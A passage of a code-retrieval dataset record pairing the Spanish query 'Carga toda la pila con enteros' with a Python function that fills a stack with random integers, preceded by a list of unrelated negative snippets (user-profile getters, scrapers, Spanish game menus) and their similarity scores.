TODO: probably we will need to extract this somewhere else\n URL = ('https://cds.cern.ch/submit/get_authors?'\n 'query={0}&relative_curdir=cdslabs%2Fvideos')\n if '0' in info or not info.get('a'):\n # There is already enough information or we don't have a name to query\n return info\n author_name = info.get('a')\n if PY2:\n # In Python 3, encoded name will change type to bytes and this will\n # cause query to CDS to fail\n author_name = author_name.encode('utf-8')\n author_info = _get_http_request(url=URL.format(author_name), retry=10)\n if not author_info or len(author_info) > 1:\n # Didn't find anything or find to many matches\n return info\n\n # Prepare author name\n author_info = author_info[0]\n if 'name' not in author_info:\n author_info['name'] = '{0}, {1}'.format(author_info['lastname'],\n author_info['firstname'])\n return MementoDict([\n (k, v) for k, v in chain(info.items(), iteritems(author_info))])", "def get_user_details(self, response):\n first_name, last_name = response['first-name'], response['last-name']\n email = response.get('email-address', '')\n return {'username': first_name + last_name,\n 'fullname': first_name + ' ' + last_name,\n 'first_name': first_name,\n 'last_name': last_name,\n 'email': email}", "def getInfo():", "def show_all_information(self):\n return self.__dict__\n # print(self.first_name)\n # print(self.last_name)\n # print(self.age)\n # print(self.name)\n # print(self.gender)\n # print(self.number_of_children)", "def _get_userinfo(self):\n if not hasattr(self, \"_userinfo\"):\n self._userinfo = {\n \"name\" : self.user_name,\n \"email\" : self.user_email\n }\n if self.user_id:\n u = self.user\n if u.email:\n self._userinfo[\"email\"] = u.email\n\n # If the user has a full name, use that for the user name.\n # However, a given user_name overrides the raw user.username,\n # so only use that if this review has no associated name.\n if u.get_full_name():\n self._userinfo[\"name\"] = self.user.get_full_name()\n elif not self.user_name:\n self._userinfo[\"name\"] = u.username\n return self._userinfo", "def who_handler(self, data, suffix=''):\n # Just to show data coming in...\n assert data['requested'] == 'name'\n\n return {\n 'name': self.get_current_user_full_name(),\n 'email': self.get_current_user_emails()\n }", "def parse_person(person):\n parsed = person_parser(person)\n if not parsed:\n parsed = person_parser_only_name(person)\n name = parsed.group('name')\n email = None\n else:\n name = parsed.group('name')\n email = parsed.group('email')\n\n return name, email", "def get_user_details(self, response):\n values = {\n 'username': unquote(response['nick']),\n 'email': unquote(response['email']),\n 'first_name': unquote(response['first_name']),\n 'last_name': unquote(response['last_name'])\n }\n\n if values['first_name'] and values['last_name']:\n values['fullname'] = '%s %s' % (values['first_name'],\n values['last_name'])\n return values", "def dictify(self):\n return {\n \"name\" : self.name,\n \"lastname\" : self.lastname,\n \"phone\" : self.phone,\n \"email\" : self.email\n }", "def __repr__(self):\r\n return {'name':self.name, 'weight':self.organ_weight_grams, 'vital organ': self.vital_organ, 'organ system': self.organ_system}", "def info(self):\n return f\"{self.get_first_name}, {self.get_last_name}. {self.get_age} y.o. #{self.get_id_number}\"", "def get_user_details(self, response):\n\n return {\n 'email': response.get('email'),\n 'id': response.get('id'),\n 'full_name': response.get('name')\n }", "def to_dict(self):\n return {\n \"id\":self.id,\n \"username\":self.email,\n \"email\":self.email,\n \"firstname\":self.firstname,\n \"lastname\":self.lastname\n }", "def get_people(team):", "def get_person_name(self, person_id):\n res = requests.get(url=\"https://api.ciscospark.com/v1/people/{}\".format(person_id),\n headers=self.headers)\n\n try:\n class person(object):\n firstName = res.json()['firstName']\n lastName = res.json()['lastName']\n\n return person\n except AttributeError as e:\n print(res.text)\n return None", "def _to_dict(self):\n\t\tauthor = Author.query.get(self.authors_id)\n\t\treturn {'id': self.id,\n\t\t\t\t'name': self.name,\n\t\t\t\t'author_id': self.authors_id,\n\t\t\t\t'author_name': author.name,\n\t\t\t\t'author_surname': author.surname}", "def user_info(username):\n print(json.dumps(client.user_info(username)))", "def format_person(adj, dict):\n name = dict['name']\n net = int(dict['net_worth (USD)'])\n return \"The {0} person is {1}. They have a net worth of ${2:,}\".format(adj, name, net)", "def details(self):\n details = ProfileDetailsParser(self.details_string())\n\n return dict(\n follows=details.follows(),\n favorites=details.favorites(),\n rating=details.rating(),\n language=details.language(),\n genres=details.genres(),\n characters=details.characters(),\n )", "def user_info(self):\n response = self.query('user_info')\n return response", "def get_pers_trans(lang: Lang) -> dict:\n return read_json(f'languages/{lang}/persons')", "def get_person(self, user_id):\n endpoint = '/user/{}'.format(user_id)\n return self.get_request(endpoint)", "def show_result(self, person):\n myopps = {}\n for entry in self.result.keys():\n if person in entry:\n parts = entry.split(':')\n if person == parts[0]:\n opp = parts[1]\n else:\n opp = parts[0]\n myopps[opp] = self.result[entry]\n slist = list(myopps.items())\n return sorted(slist, key=lambda x: x[1][1], reverse=True)", "def getInfo(self):\n request = self._connection.get('bookmarklet')\n userdata = self._userinfo_regex.search(request.text)\n if userdata is None: userdata = self._userinfo_regex_2.search(request.text)\n if userdata is None: raise errors.DiaspyError('cannot find user data')\n userdata = userdata.group(1)\n return json.loads(userdata)", "def person(self, person_id):\r\n return persons.Person(self, person_id)", "def get_people_urls(gedcom_data, apid_full_map):\n people = {}\n found = False\n logging.info(\"Extracting person specific URL information\")\n for line in gedcom_data.split(\"\\n\"):\n if len(line) > 5:\n tag = line.split(\" \")[1]\n if \"@P\" in tag:\n person = tag\n found = False\n continue\n if tag == \"_APID\" and not found:\n apid = line.split(\" \")[2]\n if apid in apid_full_map:\n if \"person_url\" in apid_full_map[apid]:\n if apid_full_map[apid][\"person_url\"] != \"\":\n people.update({person: apid_full_map[apid][\"person_url\"]})\n found = True\n logging.info(\"Person URL extraction completed\")\n return people", "def get_personal_info(line_objs):\n result = []\n start = True\n for line in line_objs:\n line_label = line.get('label')\n line_category = line.get('category')\n if line_label == 'title':\n if line_category == 'personal_info':\n start = True\n continue\n else:\n start = False\n if start:\n result.append(line)\n try:\n max_height = max([line.get('wh')[1] for line in result])\n except:\n max_height = max([line.get('wh')[1] for line in line_objs])\n track_candicate_name = False\n for line in result:\n height = line.get('wh')[1]\n if height == max_height and not track_candicate_name:\n for word in profile_words.keys():\n if word in line.get(\"text\"):\n continue\n line['label'] = 'candicate_name'\n track_candicate_name = True\n else:\n line['label'] = 'description'\n line['category'] = 'personal_info'\n return result", "def car_info(manufacturer, model_name, **other_info):\r\n car_Profile = {}\r\n car_Profile['manufacturer'] = manufacturer.title()\r\n car_Profile['model'] = model_name.title()\r\n for key, value in other_info.items():\r\n car_Profile[key] = value\r\n return car_Profile", "def read_person(person_id):\n try:\n conn = sqlite3.connect(settings.database_name)\n conn.row_factory = sqlite3.Row\n c = conn.cursor()\n c.execute(\"PRAGMA foreign_keys = ON\")\n c.execute(\"SELECT * FROM person WHERE personid =?\", (person_id,))\n _person = None\n for row in c:\n _person = Person()\n _person.person_id = row[\"personid\"]\n _person.first_name = row[\"firstname\"]\n _person.last_name = row[\"lastname\"]\n _person.middle_initial = row[\"middleinitial\"]\n _person.nick_name = row[\"nickname\"]\n _person.date_of_birth = row[\"dateofbirth\"]\n _person.date_of_death = row[\"dateofdeath\"]\n conn.close()\n return _person\n except:\n return None", "def get_personal_info(self, table):\n json_result = {}\n row_list = table.xpath('./tr[position() > 1]')\n for row in row_list:\n row_key = row.xpath('./td[1]/b/text()')\n if row_key:\n row_key = row_key[0]\n else:\n raise ProfileException(\"Failed to get key of personal info\")\n row_value = row.xpath('./td[2]/text()')\n if (len(row_value) != 0) & hasattr(row_value[0], 'strip'):\n row_value = row_value[0].strip()\n else:\n raise ProfileException(\"Failed to get value of personal info\")\n json_result.update({row_key: row_value})\n if json_result:\n return json_result\n else:\n raise ProfileException(\"Failed to get personal info table(row list is empty)\")", "def get_person_info(self, link: str) -> dict:\n self.driver.get(link)\n person_info = {}\n # Get person name\n person_info[\"ФИО\"] = self.driver.find_element_by_xpath('//h1[@data-shmid=\"profilePrepName\"]').text\n # Get education info\n personal_block = self.driver.find_element_by_xpath(\"//div[@class='_2iQ3do3']\")\n if(\"Образование\" in personal_block.text):\n try:\n edu = self.driver.find_element_by_xpath(\"//div[@class='ui-text _3fhTO7m _3xKhc83 _2iyzK60 _1A6uUTD']\")\n # Удаление лишних элементов \n waste = self.driver.find_element_by_xpath(\"//span[@class='ui-text _TE8l15y _3xKhc83 _38NyyC- _32776-7']\")\n edu = edu.text.replace(waste.text, '')\n person_info[\"Образование\"] = re.split(r\"[,;]\", edu)[0]\n except:\n pass\n # Get tution experience\n personal_block = personal_block.find_elements_by_tag_name('div')\n for block in enumerate(personal_block):\n text = block[1].text\n index = text.find('(')\n try:\n if((\"Репетиторский опыт\" in text) or (\"Опыт репетиторства\" in text)): \n if(index != -1):\n years = text[index+1:index+3]\n person_info[\"Репетиторский опыт (лет)\"] = int(years)\n else:\n years = re.split(r\"[(гл–]\", text)\n person_info[\"Репетиторский опыт (лет)\"] = int(years[1])\n break;\n elif (text.find(\"Репетиторская деятельность\") != -1):\n if(index != -1):\n years = text[index+1:index+3]\n person_info[\"Репетиторский опыт (лет)\"] = int(years)\n else:\n years = re.split(r\"[(гл–]\", text)\n person_info[\"Репетиторский опыт (лет)\"] = int(years[2])\n break;\n except:\n pass\n # Get working methods\n methods_block = self.driver.find_element_by_xpath(\"//div[@class='_3z3XSoj']\")\n if(\"Работает дистанционно\" in methods_block.text):\n person_info[\"Работает дистанционно\"] = \"+\"\n if(\"Принимает у себя\" in methods_block.text):\n person_info[\"Принимает у себя\"] = \"+\"\n if(\"Выезд к клиенту\" in methods_block.text):\n person_info[\"Выезд к клиенту\"] = \"+\"\n # Get reviews\n reviews_block = self.driver.find_element_by_xpath('//div[@data-shmid=\"ProfileTabsBlock_bar\"]')\n reviews = reviews_block.find_elements_by_tag_name('span')\n person_info[\"Количество оценок\"] = int(reviews[0].text)\n if person_info[\"Количество оценок\"] == 0:\n person_info[\"Средняя оценка\"] = 0\n for i, rate in enumerate(self.rate_list):\n person_info[self.rate_list[i]] = 0\n else:\n try:\n person_info[\"Средняя оценка\"] = float(reviews[1].text.replace(',', '.'))\n reviews_rates = self.driver.find_element_by_xpath('//div[@data-shmid=\"ReviewHistogramComponent\"]')\n reviews_rates = reviews_rates.find_element_by_xpath('//div[@class=\"_2ZifqNc\"]') \\\n .find_elements_by_tag_name('div')\n for i, review in enumerate(reviews_rates):\n person_info[self.rate_list[i]] = int(review.text)\n except:\n pass\n\n # Get all services and prices\n try:\n price_button = self.driver.find_element_by_xpath('//a[@data-shmid=\"pricesMore\"]')\n price_button.click()\n except:\n pass\n prices = self.driver.find_elements_by_xpath('//tr[@data-shmid=\"priceRow\"]')\n for price in prices:\n columns = price.find_elements_by_tag_name('td')\n if columns[0].text:\n subj = columns[0].text.split(\"\\n\")[0].strip(\".\") + \" (₽/60 мин.)\"\n price = columns[1].text.split(\"₽\")[0]\n person_info[subj] = price\n return person_info", "def rootuser_info(self, datadict):\n\n dict1 = OrderedDict()\n dict1 = datadict['entry_data']['ProfilePage'][0]['graphql']['user']\n\n userdict = OrderedDict()\n keylist = ['id', 'username', 'full_name', 'biography', 'edge_follow', 'edge_followed_by', 'is_private', 'external_url', 'profile_pic_url_hd']\n\n for key in keylist:\n if key is 'edge_follow':\n userdict['following'] = dict1[key]\n elif key is 'edge_followed_by':\n userdict['followers'] = dict1[key]\n else:\n userdict[key] = dict1[key]\n\n userdict['platform'] = datadict['platform']\n\n return (json.dumps(userdict, indent=4))", "def serialize(self):\n return {\n \"first_name\" : self.first_name.capitalize(),\n \"last_name\" : self.last_name.capitalize(),\n \"name\" : self.first_name.capitalize() + ' ' + self.last_name.capitalize(),\n \"user_id\" : self.id,\n }", "def userinfo(self, access_token: str) -> dict[str, Any]:\n data: dict[str, Any] = self.client.get(\n url=f\"{self.protocol}://{self.domain}/userinfo\",\n headers={\"Authorization\": f\"Bearer {access_token}\"},\n )\n return data", "def user_dict(self):\n return {\n \"user_id\": self.user_id,\n \"firstname\": self.firstname,\n \"lastname\": self.lastname,\n \"othernames\": self.othernames,\n \"username\": self.username,\n \"email\": self.email,\n \"phonenumber\": self.phonenumber,\n \"is_admin\": self.is_admin,\n \"password\": self.password,\n \"registered_on\": self.registered_on\n }", "def user_profile(first, last, **add_info):\n profile = {}\n profile['firstname'] = first\n profile['lastname'] = last\n\n for key, value in add_info.items():\n profile[key] = value\n \n return profile", "def get_details(self):\n owner = self.fake.random_element(elements=self.owners)\n return {\n 'jurisdiction_property_id': self.fake.numerify(text='#####'),\n 'pm_parent_property_id': self.fake.numerify(text='#####'),\n 'lot_number': self.fake.numerify(text='#####'),\n 'address_line_1': self.address_line_1(),\n 'city': 'Boring',\n 'state': 'Oregon',\n 'postal_code': \"970{}\".format(self.fake.numerify(text='##')),\n 'year_built': self.fake.random_int(min=1880, max=2015),\n 'site_eui': self.fake.random_int(min=50, max=600),\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'owner_telephone': owner.telephone,\n 'owner_address': owner.address,\n 'owner_city_state': owner.city_state,\n 'owner_postal_code': owner.postal_code,\n }", "def get_patient_dict():\r\n return common.get_dict_all(get_patient_filename(), None)", "async def get_information():\n return {\n \"message\": f\"You are the Genome Researcher. \"\n f\"You are meddling with Coronavirus Sars-Cov-2 RNA... \"\n f\"Try to change the RNA at your disposal to uncover as many medical breakthroughs as possible. \"\n f\"use GET /sample to see the original RNA strand \"\n f\"use COPY /sample to create exact duplicate of original to perform experiments. \"\n f\"Try to change the RNA at your disposal to uncover as many medical breakthroughs as possible. \"\n f\"Good luck researcher. \"\n f\"Our souls fates' depend on you! \"\n }", "def person_fields(self):\r\n return persons.PersonFields(self)", "def person(languages=None, genders=None):\n languages = languages or ['en']\n genders = genders or (GENDER_FEMALE, GENDER_MALE)\n\n\n lang = random.choice(languages)\n g = random.choice(genders)\n t = title([lang], [g])\n return first_name([lang], [g]), last_name([lang]), t, g" ]
[ "0.7562372", "0.7202004", "0.68984586", "0.6763077", "0.67415196", "0.6625842", "0.6569505", "0.65048116", "0.6392704", "0.63766086", "0.6367099", "0.6340469", "0.6332369", "0.6284719", "0.626071", "0.62580657", "0.62507343", "0.6244045", "0.62412703", "0.6240264", "0.623494", "0.62251186", "0.62028", "0.61973286", "0.61804956", "0.61673146", "0.60912734", "0.60761285", "0.6073877", "0.6059034", "0.6056644", "0.6052121", "0.6049299", "0.6048786", "0.6036848", "0.60182476", "0.60044193", "0.5999764", "0.5999764", "0.59925276", "0.59887475", "0.598865", "0.59847724", "0.59814465", "0.5979082", "0.59727126", "0.5967761", "0.5959294", "0.59363925", "0.59363145", "0.5918965", "0.5918667", "0.5916391", "0.5913866", "0.5913866", "0.5910544", "0.5902117", "0.58635193", "0.5859252", "0.5856595", "0.58475083", "0.58339757", "0.58321166", "0.58194673", "0.58070034", "0.5793663", "0.57901376", "0.57738346", "0.57659984", "0.57620275", "0.57608324", "0.57560104", "0.57548815", "0.5750218", "0.5746348", "0.5746135", "0.5743273", "0.5742414", "0.5737911", "0.57363963", "0.57343346", "0.5720929", "0.5718517", "0.57174194", "0.5713608", "0.5712191", "0.5709609", "0.5707139", "0.57054925", "0.5699128", "0.5698137", "0.5697133", "0.5692204", "0.568809", "0.56867915", "0.5669925", "0.56664485", "0.5663915", "0.5659787", "0.56588507" ]
0.5966081
47
Carga toda la pila con enteros
def cargaAutoInt(pila): while not pila_llena(pila): dato = random.randint(0, 10) apilar(pila, dato)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def comenzar_nuevo_juego():\n escena_uno.cargarEscena1(screen, display_width, display_height)#Se pone a correr la escena\n #escena_uno.cargarEscena2(screen, display_width, display_height)", "def Inicio():\n menu = \"\"\"\n Bienvenido al conversor de monedas 💰\n\n 1 - Pesos colombianos\n 2 - Pesos argentinos\n 3 - Pesos mexicanos\n\n Elige una opción: \"\"\"\n\n opcion = int(input(menu))\n \n if opcion == 1:\n moneda = 'pesos colombianos'\n elif opcion == 2:\n moneda = 'pesos argentinos'\n elif opcion == 3:\n moneda = 'pesos mexicanos'\n else:\n print(f'La opción no es valida')\n\n if opcion == 1 or opcion == 2 or opcion == 3 :\n cambio = conversor(moneda)\n print(f'La cantidad de {cambio[1]} {moneda} en dólares es de {cambio[0]} USD')", "def registro_y_login(self, cuenta, compania, dominio, usuario, password):\n self.login_page.click_desplegar_cuenta()\n self.login_page.wait_fields_load()\n self.login_page.set_cuenta(cuenta)\n self.login_page.set_jdd(compania)\n self.login_page.set_dominio(dominio)\n self.login_page.set_usuario(usuario)\n self.login_page.set_password(password)\n report.write_line(\"Llenando los datos de login\", report.Status.SUCCESS, True)\n self.login_page.click_login()", "def ejecutarOperacion(self):\n\n if self.option == 1:\n \"\"\"\n El usuario desea agregar un punto al mapa\n \"\"\"\n # Capturo los x, y\n k = self.elementoSeleccionado.split(\"-\")\n print(\"info\",k)\n x = int(k[0])\n y = int(k[1])\n # Ya capture los valores los agrego al arbol\n # Ojo: En modo creacion no entran\n self.arbol.ADD((x, y), \"X\")\n\n\n if self.option == 2:\n \"\"\"\n El usuario desea eliminar un punto del mapa\n \"\"\"\n k= self.elementoSeleccionado.split(\"-\")\n x = int(k[0])\n y = int(k[1])\n \n self.arbol.eliminarNodo((x, y))\n\n if self.option == 3:\n # Si no se ha seleccionado el punto A capturelo\n if self.PUNTOA == None and self.PUNTOB == None:\n k = self.elementoSeleccionado.split(\"-\")\n x = int(k[0])\n y = int(k[1])\n self.PUNTOA = (x, y)\n else:\n # YA se selecciono el punto A si es diferente de B se captura\n k = self.elementoSeleccionado.split(\"-\")\n x = int(k[0])\n y = int(k[1])\n # Creo el punto para poder comparar que A sea diferente de B\n temp = (x, y)\n if temp != self.PUNTOA:\n self.PUNTOB = temp\n # Lo modifico en el arbol\n self.arbol.modificarData(self.PUNTOA, self.PUNTOB)", "def mostrar_fin_juego(n_palabras):\n clear_window()\n show_title(\"FELICIDADES! GANASTE!\")\n show_msg(\"Muy bien, encontraste las %d palabras!\" % n_palabras)\n raw_input(\"Enter para menu principal \")", "def main():\n\n # on affiche la liste des cartes disponibles\n liste_des_cartes = functions.liste_cartes() + functions.liste_sauvegardes()\n functions.afficher_liste(liste_des_cartes)\n\n # selection d'une carte, un retour \"None\" indique une mauvaise saisie\n while True:\n choix = functions.choix_carte(\n input('''Indiquez le numéro de la carte choisie.\n Attention, si vous choisissez une nouvelle partie, la sauvegarde associée\n à la carte concernée sera remplacée. \\n'''), liste_des_cartes)\n if choix is not None:\n break\n\n # la carte est choisie, on peut générer un Labyrinthe\n laby = Labyrinthe(choix)\n # on affiche le tracé du labyrinthe\n print(laby.carte)\n\n # on lance la boucle du jeu\n while True:\n deplacements = input(\"\"\"Dans quelle direction voulez vous aller?\n \"E\" pour aller vers l'est, \"N\" pour aller vers le nord\n \"S\" pour aller vers le sud, \"O\" pour aller vers l'ouest\n Suivi d'un nombre (optionnel) pour le nombre de cases à parcourir\n \"Q\" pour sauvegarder et quitter\n \"\"\")\n # on vérifie que les données entrées par l'utilisateur sont valides\n instructions = functions.instructions_valide(deplacements)\n if instructions is not None:\n\n if instructions == \"quitter\":\n laby.sauvegarder_partie()\n break\n if instructions == \"lettre non valide\":\n print(\"La lettre entrée n'est pas valide \\n\")\n continue\n if instructions == \"non valide\":\n print(\"Les données entrées ne sont pas valides \\n\")\n continue\n else:\n # on vérifie si la partie est toujours active\n partie_en_cours = laby.effectuer_deplacements(instructions)\n if not partie_en_cours:\n # en cas de sortie trouvée, on supprime la sauvegarde\n laby.supprimer_partie()\n print(\"Partie terminée, sauvegarde supprimée\")\n break\n\n # On met en pause le système (Windows)\n os.system(\"pause\")", "def ejecutarproceso(self):\n self.generarConsultasLibres()\n self.aplicarConsultasLibres()\n self.generarCombinaciones()\n self.generarConsultasConexion()\n self.archivoSalida()", "def MenuPrincipal():\n\n print('''\n Menu Iterativo: \n 1. F. Escribir Centrado()\n 2. F.Es Multiplo\n 3. F.Temperatura Media\n 4. F.Convertir espaciado\n 5. F.Calcular Maximo y Minimo\n 6. F.Calcular area y permitro de una Circunferencia\n 7. F.Login\n 8. F.Factorial de un numero\n 9. F.Calcular MCD\n 10.F. Calculo de segundos y horas\n 11.F. Dia Juliano\n 12.F.\\Validar Fecha\n 13.F. Fracciones\n 14. F.SALIR\n ''')\n op = input(\"Por favor digite su opcion: \\n \")\n return op", "def juego_nuevo():\n show_title(\"Crear sopa de NxN letras\")\n nxn = pedir_entero(\"Ingrese un numero entero de la cantidad de\\nfilas y columnas que desea (Entre 10 y 20):\\n\",10,20)\n n_palabras = pedir_entero(\"Ingrese un numero entero de la cantidad de\\npalabas que deasea agregar (Entre 0 y %d):\\n\"%(nxn/2),0,(nxn/2))\n palabras = []\n palabra_min_caracteres = 3\n palabra_repetida = False\n while len(palabras)<n_palabras:\n if palabra_repetida :\n show_msg(\"Ingreso una palabra repetida\")\n palabra_repetida = False\n # Pedir una palabra que cumpla con los requisitos\n palabra = pedir_palabra(\"[%d|%d]Ingrese una palabra entre %d y %d caracteres: \"%(len(palabras)+1,n_palabras,palabra_min_caracteres,(nxn/2)),palabra_min_caracteres,(nxn/2))\n if palabra in palabras:\n palabra_repetida = True\n else :\n palabras.append(palabra)\n matrix = crear_matrix(nxn)\n matrix,posiciones,salteadas = procesar_palabras(matrix, nxn, palabras)\n matrix = completar_matrix(matrix, nxn)\n return procesar_juego(matrix,nxn,n_palabras,salteadas,posiciones)", "def entrada():\n\n #n lados\n n = int(input('Ingrese los lados del poligono: '))\n lados.append(n)\n\n for i in range(n):\n coordenada_x=int(input(f\"Ingrese el valor de la coordenada x{i+1}:\"))\n coordenada_y=int(input(f\"Ingrese el valor de la coordenada y{i+1}:\"))\n x.append(coordenada_x)\n y.append(coordenada_y)", "def cliquer(self):\n try:\n if self.input.get() != \"\":\n human = HumanPlayer(self.input.get())\n cpu = CPUPlayer(\"La Machine\", var_choix.get(), 15)\n self.input.destroy()\n self.bouton_cliquer[\"command\"] = self.jouer(human, cpu)\n except:\n input(\"Vous devez fournir un nom !\")", "def menu():\n os.system('clear')\n print(\"\\nBienvenido a el programa de Prueba de Estructura de datos\\nElija una opcion del Menu:\"+\"\\n1. Pilas\\n2. Colas\\n3. Arboles\\n4. Listas Enlazadas\\n5. Salir\")\n while True:\n try:\n value=int(input(\"\\nIntroduzca la opcion que desea utilizar: \"))\n except:\n print(\"Whoops! El valor que introdujiste no es un numero\")\n else:\n break\n return value", "def juego():\n ubicar_naves()\n global disparos_acertados, disparos_efectuados, disparos_elegidos, disparos_fallidos, disparos_repetidos\n #contadores\n disparos_efectuados = 0\n disparos_acertados = 0\n disparos_fallidos = 0\n disparos_repetidos = 0\n puntaje = 0\n for x in usuario_partida:\n usuario = x\n print(\"¿Estas listo para jugar {}? eso espero porque no hay vuelta atras\\nCargando........ :/\\n\".format(usuario))\n sleep(3)\n print(\"Mi flota esta compuesta por \\n- {} \\n- {} \\n- {}\\n Preparate para empezar\\n\".format(Portaviones.caracteristicas(Portaviones), Fragata.caracteristicas(Fragata), Submarinos.caracteristicas(Submarinos)))\n sleep(3)\n mostrar_tablero(tablero)\n while len(lista_ubicacion_barco) > 0:\n while True: #validacion para la fila ingresada por el usuario\n try:\n elegir_fila = int(input(\"Ingresa una fila: \"))\n if elegir_fila < 1 or (elegir_fila >10 and elegir_fila != 24):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha fila{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n while True: #validacion para la columna ingresada por el usuario\n try:\n elegir_columna = int(input(\"Ingresa una columna: \"))\n if elegir_columna < 1 or (elegir_columna >10):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha columna{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n tiro_elegido = (elegir_fila, elegir_columna) #cada tiro se almacena en una lista\n if tiro_elegido[0] == 24:\n print(\"Has accedido a un cheat code, los barcos estan en: \",lista_ubicacion_barco)\n elif tiro_elegido in disparos_elegidos: #si la coordenada ingresada por el usuario ya la ingreso anteriormente, quedo guardada en la lista y no le va a contar como disparo efectuadao\n print(\"Este disparo ya lo has hecho antes :|\")\n disparos_repetidos += 1 \n elif tiro_elegido in lista_ubicacion_barco:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has acertado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}F{}\".format(Fore.RED, Fore.RESET) #se remplaza la coordenada acertada por una F roja\n lista_ubicacion_barco.remove(tiro_elegido) #se quita la posicion del barco de la lista general donde estan todas las ubicaciones\n disparos_efectuados += 1\n disparos_acertados += 1\n puntaje += 10\n #se verifica si la coordenada ingresada pertenece a alguna coordenada almacenada en las listas de cada barco y se elimina\n #cuando una lista este vacia muestra un mensaje que ha hundido a la nave especificaa\n if tiro_elegido in coordenadas_portaviones: \n coordenadas_portaviones.remove(tiro_elegido) \n if len(coordenadas_portaviones) == 0:\n print(\"Felicitaciones has hundido el portaviones, su ataque aereo quedo neutralizado\\n\")\n elif tiro_elegido in coordenadas_fragata:\n coordenadas_fragata.remove(tiro_elegido)\n if len(coordenadas_fragata) == 0:\n print(\"Felicitaciones has hundido la Fragata, su comunicacion con tierra ha sido detenida\\n\")\n elif tiro_elegido in coordenadas_submarinos:\n coordenadas_submarinos.remove(tiro_elegido)\n if len(coordenadas_submarinos) == 0:\n print(\"Felicitaciones has hundido los submarinos\\n\")\n else:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has fallado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}X{}\".format(Fore.BLUE, Fore.RESET) #se remplaza la coordenada errada por una X azul\n disparos_efectuados += 1\n disparos_fallidos += 1\n puntaje -= 2\n mostrar_tablero(tablero)\n disparos_elegidos.clear()\n print(\"{}Ese disparo me ha dolido.{} Has logrado hundir toda mi flota :(\".format(Fore.RED, Fore.RESET))\n sleep(1)\n if disparos_efectuados == 9:\n print(\"¿Eres un robot? lo que acabas de hacer es poco probable... ¿viste los cheat codes verdad?\")\n elif disparos_efectuados < 45:\n print(\"Excelente estrategia\")\n elif disparos_efectuados >= 45 and disparos_efectuados <= 70:\n print(\"Buena estrategia, pero hay que mejorar(o buscar los cheat codes)\")\n elif disparos_efectuados > 70:\n print(\"{}Considérese Perdedor, tiene que mejorar{}\".format(Fore.RED, Fore.RESET))\n print(\"\\nCargando tus estadisticas :| .......... pssss deberias probar el numero de kobe en fila\\n\")\n sleep(2.5)\n for x in usuario_partida: #usuario_partida almacena el usuario de cada partida, se borra la lista cuando se ingresa otro jugador\n print(\"{}{} tus estadisticas fueron las siguientes:{}\".format(Fore.YELLOW,x, Fore.RESET))\n print(\"Disparos realizados = {}\".format(disparos_efectuados))\n print(\"Puntaje total = {}\".format(puntaje))\n print(\"Disparos repetidos = {}\".format(disparos_repetidos))\n print(\"Tu tablero quedo asi:\")\n mostrar_tablero(tablero)\n #se agregaran los puntajes y disparos del usuario a la base de datos en el txt\n for x in usuario_partida:\n y = x\n with open(\"Basedatos.txt\", \"r\") as bd:\n punto = []\n datos = bd.readlines()\n nuevo_valor = \"\"\n for x in datos:\n if y in x:\n index = datos.index(x)\n puntos = x[:-1].split(\",\")\n if int(puntos[4]) < puntaje: #si el usuario ya tiene un puntaje se va a almacenar en el txt el que sea mayor (puede ser el viejo o el que acaba de obtener)\n puntos[4] = \" {}\".format(puntaje)\n if int(puntos[5]) > disparos_efectuados: #si el usuario ya ha jugado se va a almacenar en el txt la menor cantidad de disparos que haya obtenido \n puntos[5] = \" {}\".format(disparos_efectuados)\n for x in range(len(puntos)):\n if x != len(puntos) - 1:\n nuevo_valor += puntos[x] + \",\"\n else:\n nuevo_valor += puntos[x] + \"\\n\"\n datos[index] = nuevo_valor\n with open(\"Basedatos.txt\", \"w\") as bd: #se reescribira el txt con los datos del usuario que jugo la partida actualizados\n bd.writelines(datos)", "def apilar(pila, dato):\n pila.cima += 1\n pila.datos[pila.cima] = dato", "def menu():\n\tprint (\"\\n\\tSeleccionar una opcion\")\n\n\tprint (\"\\t1.- Resistencia en un Alambre \")\n\n\tprint (\"\\t2.- Voltaje\")\n\n\tprint (\"\\t3.- Corriente\")\n\n print (\"\\t4.- Resistencia\")\n\n\tprint (\"\\t5.- salir\")", "def iniciar_method(self):\r\n self.usuario = self.usuario_ingresado.text()\r\n contrasena = self.pass_in.text()\r\n self.senal.emit([self.usuario, contrasena])", "def piedra_papel_tijeras():\n print('No hay pistas')\n while True:\n aleatorio = random.randrange(0, 3) #Genera numero aleatorio entre 0 y 3\n elijePc = \"\"\n print(\"1)Piedra\")\n print(\"2)Papel\")\n print(\"3)Tijera\")\n opcion = int(input(\"Que elijes: \")) #Selecciona la opcion a utilizar \n while opcion.type() == int and opcion not in range(1,4):\n opcion = int(input('Elige uno de los valores dados:==> '))\n\n # Cambiamos nuestra seleccion para escoger que usar\n if opcion == 1:\n elijeUsuario = \"piedra\"\n elif opcion == 2:\n elijeUsuario = \"papel\"\n elif opcion == 3:\n elijeUsuario = \"tijera\"\n\n print(\"Tu elijes: \", elijeUsuario)\n\n # Todas las posibles soluciones para el juego\n if aleatorio == 0:\n elijePc = \"piedra\"\n elif aleatorio == 1:\n elijePc = \"papel\"\n elif aleatorio == 2:\n elijePc = \"tijera\"\n print(\"PC elijio: \", elijePc)\n print(\"...\")\n if elijePc == \"piedra\" and elijeUsuario == \"papel\":\n print(\"Ganaste, papel envulve piedra\")\n return True\n elif elijePc == \"papel\" and elijeUsuario == \"tijera\":\n print(\"Ganaste, Tijera corta papel\")\n return True\n elif elijePc == \"tijera\" and elijeUsuario == \"piedra\":\n print(\"Ganaste, Piedra pisa tijera\")\n return True\n if elijePc == \"papel\" and elijeUsuario == \"piedra\":\n print(\"perdiste, papel envulve piedra\")\n return False\n elif elijePc == \"tijera\" and elijeUsuario == \"papel\":\n print(\"perdiste, Tijera corta papel\")\n return False\n elif elijePc == \"piedra\" and elijeUsuario == \"tijera\":\n print(\"perdiste, Piedra pisa tijera\")\n return False\n elif elijePc == elijeUsuario:\n print(\"empate\")", "def cambiar_escena(self, escena):\n\t\t# 